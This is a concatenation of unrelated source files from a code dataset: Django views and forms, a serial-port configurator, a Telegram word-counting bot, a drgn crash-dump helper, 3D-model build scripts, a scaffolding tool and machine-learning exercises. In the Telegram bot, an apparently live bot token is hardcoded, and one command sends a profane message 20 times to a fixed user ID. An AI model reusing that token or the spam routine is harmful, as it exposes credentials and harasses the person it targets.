'car',\n ) \\\n .prefetch_related(\n 'drop_off',\n ) \\\n .all()\n return queryset\n\n def filter_queryset(self, queryset):\n serializer = RentFilterSerializer(data=self.request.query_params)\n serializer.is_valid(raise_exception=True)\n\n start_date = serializer.validated_data.get('start_date')\n end_date = serializer.validated_data.get('end_date')\n\n if start_date and end_date:\n\n queryset = queryset.exclude(\n Q(start_date__lte=end_date),\n Q(end_date__gte=start_date),\n )\n return super().filter_queryset(queryset)\n \n def count_free(self, months, rent):\n\n current_day_year = datetime.date.today()\n last_day_year = datetime.date.today().replace(month=12, day=31)\n\n current_year = datetime.date.today().year\n start_date = rent.start_date\n end_date = rent.end_date\n\n\n if start_date == None and end_date == None:\n for i in range(1, 13):\n for j in range(1, monthrange(current_year, list(months)[i-1])[1]+1):\n months[i][j] += 1\n else:\n start = None\n end = None\n for j in range(current_day_year.month, start_date.month + 1):\n if j == start_date.month:\n start = current_day_year.day\n end = start_date.day\n\n for i in range(start, end):\n months[j][i] += 1\n else:\n start = current_day_year.day\n if current_day_year.month == j:\n end = start_date.day\n else:\n end = monthrange(current_year, j)[1]\n\n for i in range(start, monthrange(current_year, j)[1] + 1):\n months[j][i] += 1\n for k in range(1, end + 1):\n months[j + 1][k] += 1\n # теперь от даты конца и до конца года\n for j in range(start_date.month, 13):\n if j == start_date.month:\n start = end_date.day\n end = monthrange(current_year, j)[1] + 1\n for i in range(start, end):\n months[j][i] += 1\n else:\n start = 1\n end = monthrange(current_year, j)[1] + 1\n for i in range(start, end):\n months[j][i] += 1\n\n\n\n @action(detail=False, methods=['GET'])\n def information(self, request):\n queryset = self.get_queryset()\n\n serializer = RentByLocationSerializer(data=request.GET)\n serializer.is_valid(raise_exception=True)\n \n pick_up = serializer.validated_data.get('pick_up')\n drop_off = serializer.validated_data.get('drop_off')\n \n queryset = queryset \\\n .filter(pick_up=pick_up,\n drop_off=drop_off)\n\n year = datetime.date.today().year\n \n months = dict.fromkeys(range(1, 13))\n for i in range(1, 13):\n days = list(itertools.chain.from_iterable(calendar.monthcalendar(year, i)))\n clean_days = dict.fromkeys([day for day in days if day != 0], 0)\n months[i] = clean_days\n \n\n for i in range(len(queryset)):\n self.count_free(months, queryset[i])\n\n data = json.dumps(months)\n \n return Response(data, status=status.HTTP_200_OK)\n\n","repo_name":"zhunus1/turla_backend","sub_path":"rents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"36843950415","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 9 20:30:43 2019\n\n@author: kai-s\n\nthis module contains configuration functions for the UltrasonicSoundBarrier\n\"\"\"\n\nimport datetime\nimport serial\n# open connection\nconnection = serial.Serial('COM10',baudrate = 9600,timeout = 1)\n\n# Software Interface Layer\n #This function allows an complete or time only configuration\ndef init_module(full_config):\n # Get current time\n now = current_time()\n send_serial(now)\n # configurate alarms\n if full_config:\n na_module()\n \n #close serial port\n else:\n connection.close()\n\n# Create two new alarms \ndef na_module(): \n alarms = [\"Alarm1\",\"Alarm2\",\"z\\r\\n\"]\n # configurate alarms\n alarms[0] = new_alarm()\n alarms[1]= new_alarm()\n joint_alarms = \",\".join(alarms)\n send_serial(joint_alarms)\n #close serial port\n connection.close()\n\n \n \n# Barebone Init Functions\n # Get the current time -> return to Send Serial Layer\ndef current_time():\n #connected_device = serial.Serial('COM10', baudrate = 9600, timeout = 1)\n \n date_time= [12,40,00,0,11,2018,00]\n timestamp = datetime.datetime.now()\n date_time[0]= timestamp.hour\n date_time[1]= timestamp.minute\n date_time[2]= timestamp.second\n date_time[3]= timestamp.year\n date_time[4]= timestamp.month\n date_time[5]= timestamp.day\n # Terminate String\n date_time[6] =\"z\\r\\n\"\n \n for x in range(0, 7):\n date_time[x] = str(date_time[x])\n #print(date_time[x])\n \n timestamp = \",\".join(date_time)\n \n return timestamp \n\n # Function for creating new alarm -> return to Send Serial\ndef new_alarm() :\n inputs = [\"Hours\",\"Minutes\",\"Seconds\"]\n # send 'g' to enter config menue\n connection.write(b'g')\n \n # wait for ACK string to be received\n \n \n \n # Get input from user\n for i in range(3):\n print(\"Please Enter \" + inputs[i])\n inputs[i] = str(input())\n \n # Merge strings together\n alarm = \",\".join(inputs)\n print(alarm)\n #return string from function\n return alarm; \n\n# Hardware Interface Layer\n # only this function actually interfaces to the Hardware\ndef send_serial(nts):\n#encode to bytes\n string_b = nts.encode()\n# send to Serial Port \n connection.write(string_b)","repo_name":"KaiStaud/UltrasonicSoundBarrier","sub_path":"3_Interface_Programms/config_functions.py","file_name":"config_functions.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"12724627537","text":"def dfs(tickets):\n n = len(tickets)\n twithIdx = [[x[0], x[1], i] for i,x in enumerate(tickets)]\n start = sorted([x for x in twithIdx if x[0] == \"ICN\"], key=lambda x: x[1])[0]\n stack = [start[0], start[1]]\n visited = [False] * n\n visited[start[2]] = True\n ans = []\n while len(ans) + len(stack) != len(tickets) + 1:\n top = stack[-1]\n nextlist = sorted([x for x in twithIdx if x[0] == top and not visited[x[2]]], key=lambda x:x[1])\n if len(nextlist) == 0:\n tmp = stack.pop()\n ans.append(tmp)\n continue\n nextnode = nextlist[0]\n stack.append(nextnode[1])\n visited[nextnode[2]] = True\n while stack:\n ans.append(stack.pop())\n return list(reversed(ans))\n \ndef solution(tickets):\n return dfs(tickets)\n\n \nprint(dfs([[\"ICN\", \"JFK\"], [\"HND\", \"IAD\"], [\"JFK\", \"HND\"]]))","repo_name":"leesunmin1231/Coding_test","sub_path":"프로그래머스/랜덤/여행경로.py","file_name":"여행경로.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74263278984","text":"import telebot\nimport json\ntoken = \"5259442386:AAGZjTZP-O_2ajDvx9gY35nFDV_6wX-OEPo\"\nbot = telebot.TeleBot(token)\n\n@bot.message_handler(commands=[\"start\"])\ndef bot_message_handler(message):\n bot.send_message(message.chat.id, str(message.chat.id) + \" тесттовое сообщение при START!!!!\")\n\n\n@bot.message_handler(commands=[\"zaebat_peska\"])\ndef bot_message_handler(message):\n for i in range(20):\n bot.send_message(361570583, \" ЗАЕБЕМ ПЕСКА \"*10)\n\n\n@bot.message_handler(commands=[\"count\"])\ndef bot_message_handler(message):\n dict1 = json.load(open(\"dict_counter.txt\", \"r\"))\n\n #dict1 = json.load(open(\"dict_counter.txt\", \"r\"))\n res = []\n result = \"\"\n D = dict1.copy()\n lst_v = list(D[str(message.chat.id)].values())\n\n for i in range(7):\n res.append(lst_v.index(max(lst_v)))\n result += f\"{i+1}. {list(D[str(message.chat.id)].items())[lst_v.index(max(lst_v))]}\\n\"\n lst_v[lst_v.index(max(lst_v))] = 0\n result += f'\\n всего уникальных слов было использовано - {len(dict1[str(message.chat.id)])}'\n\n bot.send_message(message.chat.id, f\"самые часто используемые слова в вашей беседе это:\\n {result}\")\n\n\n@bot.message_handler(func=lambda message: message)\ndef bot_message_handler(message):\n lst = message.text.split(' ')\n dict1 = json.load(open(\"dict_counter.txt\", \"r\"))\n\n for i in lst:\n if i.strip('.,?!-_') not in ['а','и','но','в','это', 'если','без','с','как','за','до','я','ты','мы', 'все','всё','лол', 'на', 'не', 'к', '','Путин','путин','к','что','чтобы','у','нас']:\n try:\n if i.strip('.,?!-_') not in dict1[str(message.chat.id)]:\n dict1[str(message.chat.id)][i.strip('.,?!-_')] = 1\n json.dump(dict1, open(\"dict_counter.txt\", \"w\"), indent=4, ensure_ascii=False)\n else:\n dict1[str(message.chat.id)][i.strip('.,?!-_')] += 1\n json.dump(dict1, open(\"dict_counter.txt\", \"w\"), indent=4, ensure_ascii=False)\n except KeyError:\n dict1[str(message.chat.id)] = {}\n dict1[str(message.chat.id)][i.strip('.,?!-_')] = 1\n json.dump(dict1, open(\"dict_counter.txt\", \"w\"), indent=4, ensure_ascii=False)\n\n\n@bot.message_handler(func=lambda message: message.text in [\"ТЕСТ\"])\ndef bot_message_handler(message):\n print('принял сообщение в группе')\n bot.send_message(message.from_user.id, \" тесттовое сообщение при ТЕСТЕ\")\n bot.send_message(message.chat.id, \" тесттовое сообщение при ТЕСТЕ!!!!\")\n\nbot.infinity_polling()\n","repo_name":"Goodila/bot_counter_v1.1","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34041586256","text":"#!/usr/bin/env python3\nimport math\nimport re\n\nfrom drgn import Object\nfrom drgn import Program\nfrom drgn.helpers.linux.list import list_for_each_entry\nfrom drgn.helpers.linux.printk import get_printk_records\nfrom drgn.helpers.linux.mm import page_to_virt\n\n\ndef get_crashstash(prog: Program) -> bytes:\n log = get_printk_records(prog)\n log.sort(key=lambda l: l.timestamp)\n expr = re.compile(\n rb\"crashstash: STASH: (?P[a-fA-F0-9]+) \"\n rb\"SIZE: (?P[a-fA-F0-9]+) \"\n rb\"PAGES: (?P[a-fA-F0-9]+)\"\n )\n for rec in reversed(log):\n match = expr.fullmatch(rec.text)\n if match:\n break\n else:\n raise Exception(\"Could not find a crashstash log record\")\n\n head = Object(prog, \"struct list_head *\", value=int(match.group(\"STASH\"), 16))\n size = Object(prog, \"u64\", address=int(match.group(\"SIZE\"), 16)).value_()\n page_count = Object(prog, \"u64\", address=int(match.group(\"PAGES\"), 16)).value_()\n\n pages = list(list_for_each_entry(\"struct page\", head, \"lru\"))\n PAGE_SIZE = prog[\"PAGE_SIZE\"].value_()\n\n if len(pages) != page_count or page_count != math.ceil(size / PAGE_SIZE):\n raise Exception(\"Inconsistent metadata for crashstash size\")\n\n data = b\"\"\n for page in pages:\n chunksz = min(PAGE_SIZE, size)\n chunkdat = prog.read(page_to_virt(page), chunksz)\n data += chunkdat\n size -= chunksz\n return data\n","repo_name":"brenns10/kernel_stuff","sub_path":"crashstash/crashstash.py","file_name":"crashstash.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16249232237","text":"'''Contains functions to help with default settings\nCreated on Feb 14, 2011\n\n@author: jnaous\n'''\nimport sys\nsys.path.append(\"/opt/ofelia/expedient/src/python/expedient/clearinghouse/\")\n\ndef append_to_local_setting(setting_name, l, globals_dict, at_start=False):\n \"\"\"Set or update a setting by adding items to it.\n \n If a setting with name C{EXTRA_%s} % C{setting_name} exists in C{localsettings}\n then this function will add append list C{l} to the value of\n EXTRA_C{setting_name}. The setting in C{localsettings} must be a list.\n This function will actually set the value in the module, so no need to\n reset it.\n \n @param setting_name: The name of the setting, to which an \"EXTRA_\" will\n be prepended.\n @type setting_name: C{str}\n @param l: list to append to the setting's value\n @type l: list\n @param globals_dict: the globals for the module calling the function\n @type globals_dict: C{dict}\n @keyword at_start: Should the list be inserted at the start?\n Default is False\n @type at_start: C{bool}\n \n @return: the value of the new setting.\n \"\"\"\n \n import localsettings\n setting = getattr(localsettings, \"EXTRA_%s\" % setting_name, [])\n v = l + setting if at_start else setting + l\n _modname = globals_dict['__name__']\n _caller_mod = sys.modules[_modname]\n setattr(_caller_mod, setting_name, v)\n return v\n\ndef get_or_set_default(setting_name, default, globals_dict):\n \"\"\"Get or set a default setting from localsettings.\n \n If the setting with name C{setting_name} is in localsettings, then\n use that as the default value. Otherwise, use C{default}. This function\n will actually set the value in the module, so no need to reset it.\n \n @param setting_name: The setting name to be set\n @type setting_name: C{str}\n @param default: The dafult value of the setting if not found.\n @type default: unspecified.\n @param globals_dict: the globals for the module calling the function\n @type globals_dict: C{dict}\n \n @return: The value that was set.\n \"\"\"\n import localsettings\n if hasattr(localsettings, setting_name):\n v = getattr(localsettings, setting_name)\n else:\n v = default\n\n _modname = globals_dict['__name__']\n _caller_mod = sys.modules[_modname]\n \n setattr(_caller_mod, setting_name, v)\n return v\n","repo_name":"fp7-ofelia/ocf","sub_path":"expedient/src/python/expedient/clearinghouse/defaultsettings/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"81"} +{"seq_id":"73792496906","text":"#!/us/bin/python3\n\nimport os\nimport re\nimport subprocess\n\nPinsTypeName = ['Stright', 'Right_Angle', 'SMD']\n\n\n\ndef set_env():\n openscad_path = 'C:\\\\Program Files\\\\OpenSCAD'\n meshlabserver_path = 'C:\\\\Program Files\\\\VCG\\\\MeshLab'\n os.environ['PATH'] = meshlabserver_path + os.pathsep + openscad_path + os.pathsep + os.environ['PATH']\n\n\ndef change_material(filepath, material):\n model = ''\n with open(filepath, 'r+') as wrl_file:\n model = wrl_file.read()\n model = re.sub(r'(material Material[\\s]*{)[^}]*', material, model)\n wrl_file.seek(0)\n wrl_file.truncate(0)\n wrl_file.write(model)\n\n\ndef get_geometry(filename):\n with open(filename, 'r') as wrl_file:\n model = wrl_file.read()\n geometry = re.search(r'(geometry[^;]*?)appearance', model).group(1) + ' }'\n geometry = re.sub(r'\\s(.*){', r' {', geometry)\n geometry = re.sub(r'\\s(.*)\\[', r' [', geometry)\n geometry = re.sub(r'[^ ] {12}([^ ])', '\\n \\\\1', geometry)\n geometry = re.sub(r'[^ ] {10}([^ ])', '\\n \\\\1', geometry)\n geometry = re.sub(r'[^ ] {8}([^ ])' , '\\n \\\\1', geometry)\n geometry = re.sub(r'[^ ] {6}([^ ])' , '\\n \\\\1', geometry)\n geometry = re.sub(r'[^ ] {7}([^ ])' , '\\n \\\\1', geometry)\n return geometry\n\n\ndef build_model(housing, pins):\n header = \"#VRML V2.0 utf8\\n\\nchildren [\"\n footer = \"\\n]\\n\"\n pins_material = '''\n Shape {\n appearance Appearance {\n material Material {\n diffuseColor 0.72 0.72 0.72\n emissiveColor 0.0 0.0 0.0\n specularColor 1.0 1.0 1.0\n ambientIntensity 1.0\n transparency 0.0\n shininess 1.0\n }\n }\n '''\n housing_material = '''\n Shape {\n appearance Appearance {\n material Material { \n diffuseColor 1.0 1.0 1.0\n emissiveColor 0.0 0.0 0.0\n specularColor 1.0 1.0 1.0\n ambientIntensity 1.0\n transparency 0.0\n shininess 1.0\n }\n }\n '''\n return header + housing_material + housing + pins_material + pins + footer\n\n\ndef build_stl():\n\n print('Make STL')\n\n if not os.path.exists('stl'):\n os.makedirs('stl')\n\n for PinsNumber in range(2,21):\n\n # Housing\n print('Build WF-{0:02}_Housing.stl'.format(PinsNumber))\n command = 'openscad -D Pins_Number={0} -D Pins_Type=1 -D Pins_Enable=0 -D Housing_Enable=1 -o stl/WF-{0:02}_Housing.stl WFxx.scad'.format(PinsNumber)\n subprocess.call(command)\n\n print('Build WF-{0:02}_Housing_Right_Angle.stl'.format(PinsNumber))\n command = 'openscad -D Pins_Number={0} -D Pins_Type=2 -D Pins_Enable=0 -D Housing_Enable=1 -o stl/WF-{0:02}_Housing_Right_Angle.stl WFxx.scad'.format(PinsNumber)\n subprocess.call(command)\n\n # Pins\n for PinsType in range(1,4):\n print('Build WF-{0:02}_Pins_{1}.stl'.format(PinsNumber, PinsTypeName[PinsType-1]))\n command = 'openscad -D Pins_Number={0} -D Pins_Type={1} -D Pins_Enable=1 -D Housing_Enable=0 -o stl/WF-{0:02}_Pins_{2}.stl WFxx.scad'.format(PinsNumber, PinsType, PinsTypeName[PinsType-1])\n subprocess.call(command)\n\n\ndef build_wrl():\n\n print('Convert to VRML')\n\n if not os.path.exists('wrl'):\n os.makedirs('wrl')\n\n for PinsNumber in range(2,21):\n\n # Convert housing to VRML\n print('Build WF-{0:02}_Housing.wrl'.format(PinsNumber))\n command = 'meshlabserver -i stl/WF-{0:02}_Housing.stl -o wrl/WF-{0:02}_Housing.wrl'.format(PinsNumber)\n subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n print('Build WF-{0:02}_Housing_Right_Angle.wrl'.format(PinsNumber))\n command = 'meshlabserver -i stl/WF-{0:02}_Housing_Right_Angle.stl -o wrl/WF-{0:02}_Housing_Right_Angle.wrl'.format(PinsNumber)\n subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n # Convert pins to VRML\n for PinsType in range(1,4):\n print('Build WF-{0:02}_Pins_{1}.wrl'.format(PinsNumber, PinsTypeName[PinsType-1]))\n command = 'meshlabserver -i stl//WF-{0:02}_Pins_{1}.stl -o wrl/WF-{0:02}_Pins_{1}.wrl'.format(PinsNumber, PinsTypeName[PinsType-1])\n subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n\ndef build():\n build_stl()\n build_wrl()\n\n if not os.path.exists('out'):\n os.makedirs('out')\n\n print('-----')\n\n for PinsNumber in range(2,21):\n for PinsType in range(1,4):\n\n print('Build WF-{0:02}_{1}.wrl'.format(PinsNumber, PinsTypeName[PinsType-1]))\n\n housing = ''\n if PinsType == 2:\n housing = get_geometry('wrl/WF-{0:02}_Housing_Right_Angle.wrl'.format(PinsNumber))\n else:\n housing = get_geometry('wrl/WF-{0:02}_Housing.wrl'.format(PinsNumber))\n\n pins = get_geometry('wrl/WF-{0:02}_Pins_{1}.wrl'.format(PinsNumber, PinsTypeName[PinsType-1]))\n\n with open('out/WF-{0:02}_{1}.wrl'.format(PinsNumber, PinsTypeName[PinsType-1]), 'w') as wrl_file:\n wrl_file.write(build_model(housing, pins))\n\n \nif __name__ == '__main__':\n set_env()\n build()","repo_name":"kolod/DipTrace-WFxx","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":5359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13548940378","text":"from django.forms import ModelForm, widgets\nfrom .models import Patient\n\nclass PatientForm(ModelForm):\n class Meta:\n model = Patient\n fields = '__all__'\n exclude = ['date_added']\n labels = {\n 'case_paper_number': 'Case Paper Number',\n 'full_name': 'Full Name',\n 'birth_date': 'Date of Birth',\n 'mobile_number': 'Mobile Number',\n 'pin_code': 'Pin Code',\n 'referred_by': 'Referred By',\n 'city': 'City/Town/Village'\n }\n widgets = {\n 'case_paper_number': widgets.TextInput(attrs={'autocomplete': 'off'}),\n 'full_name': widgets.TextInput(attrs={'autocomplete': 'off'}),\n 'birth_date': widgets.DateInput(format= '%d-%m-%Y', attrs={'class':'form-control', 'autocomplete':'off', 'placeholder': 'dd-mm-yyyy'}),\n 'mobile_number': widgets.NumberInput(attrs={'type': 'number'}),\n 'email': widgets.EmailInput(),\n 'pin_code': widgets.NumberInput(attrs={'required': 'required'}),\n }\n","repo_name":"pcgujar2019/docmessenger","sub_path":"patients/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5907842051","text":"from sklearn.metrics import mean_absolute_error, mean_squared_error\nfrom sklearn.model_selection import train_test_split\nfrom lightgbm import LGBMClassifier\nfrom pathlib import Path\nimport pandas as pd\nimport warnings\nimport requests\n# import datetime ########## from datetime import datetime으로 변경\nfrom datetime import datetime\n# import optuna ########## 사용하지 않으므로 삭제\nimport json\nimport copy\nimport os\nimport parking_input_data\nprint('!!!!!!!!!!!!!!! Start park_analysis.py !!!!!!!!!!!!!!!')\nos.chdir(os.path.dirname(os.path.abspath(__file__)))\npath = Path.cwd().parent\nraw_data = str(path) + '/raw_data/'\ndata = str(path) + '/data/'\nresult = str(path) + '/result_data/'\n\nwarnings.filterwarnings(action='ignore')\n\n# 데이터 로드\nprint(datetime.now().strftime('%Y.%m.%d %Hh%Mm%Ss'), 'Load Data')\ndf = parking_input_data.dataset\ndf = df.astype(float)\ndf[['연','월','일','시']] = df[['연','월','일','시']].astype(int)\n\npredict_df = parking_input_data.predict_dataset\npredict_df=predict_df.astype(float)\npredict_df[['연','월','일','시']] = predict_df[['연','월','일','시']].astype(int)\n\n# train, test 나누기\ntrain_data, test_data = train_test_split(df, test_size=0.33, random_state=42)\n\nX_train, y_train = train_data.drop('혼잡도', axis=1), train_data['혼잡도']\nX_test, y_test = test_data.drop('혼잡도', axis=1), test_data['혼잡도']\n\n# 모델 적합\nprint(datetime.now().strftime('%Y.%m.%d %Hh%Mm%Ss'), 'Fit Model')\nmodel = LGBMClassifier(random_state=42) ######## 실행할 때마다 결과가 바뀌면 안 됨 --> random_state 지정\nmodel.fit(X_train, y_train, categorical_feature=['주차장'], eval_set=(X_test,y_test), verbose=1)\n\n# 적합된 모델로 혼잡도 예측\nprint(datetime.now().strftime('%Y.%m.%d %Hh%Mm%Ss'), 'Predict')\npredict_df = predict_df[X_train.columns]\n\n\npredict = pd.DataFrame(model.predict(predict_df))\noutput = pd.concat([predict_df, predict], axis= 1)\noutput = output.rename(columns={0:'혼잡도예측'})\noutput = output[['연','월','일','시','분','요일','주차장','혼잡도예측']]\n\n# 예측일시, 시간대 추가\noutput['예측일시'] = output['연'].astype(str) + output['월'].astype(str) + output['일'].astype(str)\noutput['시간대'] = output['시'].astype(str) + output['분'].astype(str)\n\n# 결과 테이블 만들기\nresult_table = pd.DataFrame(columns=['등록일시', '주차장명', '예측일시', '시간대', '혼잡도'])\nresult_table['주차장명'] = output['주차장']\nresult_table['예측일시'] = output['예측일시']\nresult_table['시간대'] = output['시간대']\nresult_table['혼잡도'] = output['혼잡도예측']\nresult_table['등록일시'] = datetime.now().strftime('%Y%m%d%H%M%S')\nresult_table = result_table.astype(str)\n#result_table.to_csv(result + f'park_analysis.csv', index=False, encoding='utf-8-sig')\n\n","repo_name":"KeumHyeonJun/Governmnet_project","sub_path":"주차예측/parking_park_analysis.py","file_name":"parking_park_analysis.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16723828931","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 15 23:34:35 2018\n\n@author: Shivam-PC\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib as plt\n\ndataset = pd.read_csv(\"50_Startups.csv\")\n\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 4].values\n\n# Encoding categorical data\n# Encoding the Independent Variable\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nlabelencoder_X = LabelEncoder()\nX[:, 3] = labelencoder_X.fit_transform(X[:, 3])\nonehotencoder = OneHotEncoder(categorical_features = [3])\nX = onehotencoder.fit_transform(X).toarray()\n\n# removing dummy valiable trap\nX = X[:, 1:]\n\n\n#splitting dataset\n#spitting the dataset into training set and text set\nfrom sklearn.cross_validation import train_test_split\nX_train, X_test, y_train, y_test = train_test_split( X , y, test_size=0.2, random_state=0)\n\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\nprint(regressor.score(X_test, y_test))\n\n#predicting the testset result\ny_pred = regressor.predict(X_test) \n\n\n# Building the optimal model using backward elimination\nimport statsmodels.formula.api as sm\n# appending a columns of 1 for b0 part of formula\nX = np.append(arr=np.ones((50,1)).astype(int), values=X, axis=1) \nX_opt = X[:, [0, 1, 2, 3, 4, 5]]\n\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\n#fitting all variables\nX_opt = X[:, [0, 1, 3, 4, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\n#removing highest p if p>0.05 \nX_opt = X[:, [0, 3, 4, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\n#removing highest p if p>0.05 \nX_opt = X[:, [0, 3, 5]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\n#removing highest p if p>0.05 \nX_opt = X[:, [0, 3]]\nregressor_OLS = sm.OLS(endog = y, exog = X_opt).fit()\nregressor_OLS.summary()\n\n# AutomaticBackward Elimination with p-values and Adjusted R Squared:\nimport statsmodels.formula.api as sm\ndef backwardElimination(x, SL):\n numVars = len(x[0])\n temp = np.zeros((50,6)).astype(int)\n for i in range(0, numVars):\n regressor_OLS = sm.OLS(y, x).fit()\n maxVar = max(regressor_OLS.pvalues).astype(float)\n adjR_before = regressor_OLS.rsquared_adj.astype(float)\n if maxVar > SL:\n for j in range(0, numVars - i):\n if (regressor_OLS.pvalues[j].astype(float) == maxVar):\n temp[:,j] = x[:, j]\n x = np.delete(x, j, 1)\n tmp_regressor = sm.OLS(y, x).fit()\n adjR_after = tmp_regressor.rsquared_adj.astype(float)\n if (adjR_before >= adjR_after):\n x_rollback = np.hstack((x, temp[:,[0,j]]))\n x_rollback = np.delete(x_rollback, j, 1)\n print (regressor_OLS.summary())\n return x_rollback\n else:\n continue\n regressor_OLS.summary()\n return x\n \nSL = 0.05\nX_opt = X[:, [0, 1, 2, 3, 4, 5]]\nX_Modeled = backwardElimination(X_opt, SL)\n\n","repo_name":"agrawalshivam66/Udemy-machine_lerning","sub_path":"Multiple_Linear_Regression/Multiple_Linear_Regression.py","file_name":"Multiple_Linear_Regression.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41258143573","text":"from datetime import date\n\ndata = {}\nthisYear = date.today().year\ndata['name'] = str(input('Name: '))\nbirthDate = int(input('Birth date: '))\ndata['age'] = thisYear - birthDate\ndata['CTPS'] = int(input('CTPS: '))\n\nif (data['CTPS'] != 0) :\n data['hiring'] = int(input('Hiring year: '))\n data['salary'] = float(input('Salary: '))\n data['retirement'] = data['age'] + (35 - (thisYear - data['hiring']))\n\nprint('~=' * 30)\n\nfor k, v in data.items():\n print(f'The {k} has the value {v}')","repo_name":"joelmedeiros/studies.py","sub_path":"Fase19/Challange92.py","file_name":"Challange92.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70134988104","text":"\"\"\"\nProject scaffolding tool.\n\nCreates files from blueprints pulled from `files_base`, replacing some variables.\n\nIgnores files which are already present -> delete them to have new ones created.\n\nAssumptions:\n\n - gitlab repos, if not gitlab.com are deemed as private\n - gitlab pages server on http\n\n\n\"\"\"\n\nimport json\nimport os\nimport readline\nimport sys\nfrom datetime import date\nfrom functools import partial\n\nimport requests\nimport toml\nimport yaml\n\nfrom devapp.app import app, do\nfrom devapp.tools import exists, get_deep, read_file, write_file\n\ntoday = date.today()\nhere = lambda: os.getcwd()\ng = lambda k, v, d=None: getattr(k, v, d)\n\n\ndef do(*a, d=do, **kw):\n kw['ll'] = kw.get('ll', 10)\n return d(*a, **kw)\n\n\nfiles_base = 'https://raw.githubusercontent.com/axiros/docutools/master/'\nget_file_master = lambda fn: requests.get(files_base + fn).text\n\nFiles = [\n 'make',\n 'environ',\n 'mkdocs.yml',\n 'pyproject.toml',\n 'scripts/conda.sh',\n 'scripts/self_update',\n 'docs/mdreplace.py',\n 'docs/about/changelog.md',\n 'docs/about/coverage.md',\n 'docs/about/credits.md',\n 'docs/about/todo.md',\n 'docs/about/navigation.md',\n 'config/coverage.lp.ini',\n 'config/coverage.pytest.ini',\n 'config/pytest.ini',\n]\n\n\nclass vars:\n have = {}\n variables = set()\n\n class project_name:\n pyproj_key = 'tool.poetry.name'\n env_key = 'PROJECT'\n dflt = lambda: os.path.basename(here())\n\n class project_description:\n pyproj_key = 'tool.poetry.description'\n\n class pyver:\n env_key = 'pyver'\n pyproj_key = 'tool.poetry.dependencies.python'\n dflt = lambda: '%s.%s' % (sys.version_info.major, sys.version_info.minor)\n\n def validate(v):\n l = v.split('.', 1) # ^3.5 -> 3.\n return l[0][-1] + '.' + l[1]\n\n class version:\n pyproj_key = 'tool.poetry.version'\n dflt = lambda: '%s.%02d.%02d' % (today.year, today.month, today.day)\n\n class author:\n pyproj_key = 'tool.poetry.authors'\n\n def dflt(_=lambda k: os.popen('git config --get user.%s' % k).read().strip()):\n return '%s <%s>' % (_('name'), _('email'))\n\n def validate(v: str):\n if isinstance(v, list):\n v = v[0]\n assert '@' in v and '<' in v and '>' in v, 'Require valid email'\n return v\n\n class license:\n pyproj_key = 'tool.poetry.license'\n dflt = 'Commercial'\n\n class repository:\n pyproj_key = 'tool.poetry.repository'\n exmpl = [\n 'https://github.com/mycompany/myproject',\n 'https://gitlab.mycompany.com/mycompany/myproject',\n ]\n\n def validate(v):\n assert v.startswith('https://'), 'Must start with https://'\n return v\n\n class dependencies:\n pyproj_key = 'tool.poetry.dependencies'\n dflt = lambda: get_toppest_devapp_pgk(['devapps'])\n\n def validate(v):\n if isinstance(v, str):\n v = (v, '*')\n if isinstance(v, tuple):\n v = {v[0]: '^' + v[1]}\n return v\n\n\nfor k in dir(vars):\n if isinstance(g(vars, k), type) and not k[0] == '_':\n vars.variables.add(g(vars, k).__name__)\n\n\nclass Have:\n git = {}\n environ = {}\n pyproject = {}\n mkdocs = {}\n prev_answers = {}\n\n def load_previous_answers():\n a = json.loads(read_file(fn_answ(), dflt='{}'))\n if a:\n app.info('Using previous answers at', fn=fn_answ(), **a)\n Have.prev_answers.update(a)\n\n def read_environ_files():\n # for f in 'environ', 'environ.personal':\n # fn = here() + '/' + f\n # if os.path.exists(fn):\n # dependent on /bin/sh, too unreliable - he has to source it:\n # p = os.popen('source \"%s\" only; env' % fn).read().splitlines()\n # for line in p:\n # l = line.split('=', 1)\n # Have.environ[l[0]] = l[1]\n 